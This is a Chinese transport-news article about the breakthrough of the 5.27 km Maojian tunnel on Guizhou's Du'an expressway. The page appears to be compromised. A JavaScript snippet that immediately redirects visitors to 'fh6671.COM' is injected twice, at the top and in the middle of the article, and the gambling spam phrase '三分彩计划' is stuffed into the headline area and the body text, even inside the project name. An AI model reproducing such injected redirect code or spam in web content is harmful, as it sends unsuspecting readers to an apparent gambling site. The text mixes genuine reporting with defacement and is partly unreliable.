function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

【贵州】贵州高速公路集团都安项目毛尖隧道顺利贯通

2020-11-17 16:37:36 来源:中国交通新闻网 作者:孙焕钦

11月12日上午11时,贵州高速公路集团有限公司都()安(三分彩计划)高速公路11标毛尖隧道左幅顺利贯通,该隧道在历经958个日夜攻坚后实现了全线贯通。

function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

毛尖隧道位于都匀市毛尖镇境内,隧道长约5.27公里,其后半段1.8公里为低瓦斯工区,总投资6.32亿元。隧道设计行车时速100公里,主洞正常段净宽11米、净高5米,设置6处紧急停车带、6处行车横洞、14处行人横洞与2处配电横洞,是都安项目全线最长隧道工程,也是全项目的控制性工程。

三分彩计划在建设过程中,项目参建单位克服了岩溶、涌水、瓦斯等不良地质影响,按照“保围岩”“稳基脚”“固侧壁”“早成环”的方针,以安全生产为核心,以科学管理、合理组织为手段,严格标准化作业,强化质量安全管控,确保了工程“优质、高效、安全”完成。

都安项目是国家高速公路都匀至香格里拉高速公路的首段,由贵州高速集团组织实施建设,是贵州省截至目前单体规模最大的高速公路建设项目,先后被交通运输部、省交通运输厅明确为品质工程、绿色公路、钢结构桥梁、BIM技术应用、质量安全“微创新”示范项目,项目建设阶段的经验和成果为贵州山区高速品质工程、绿色公路创建提供了切实有效的示范带动作用。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。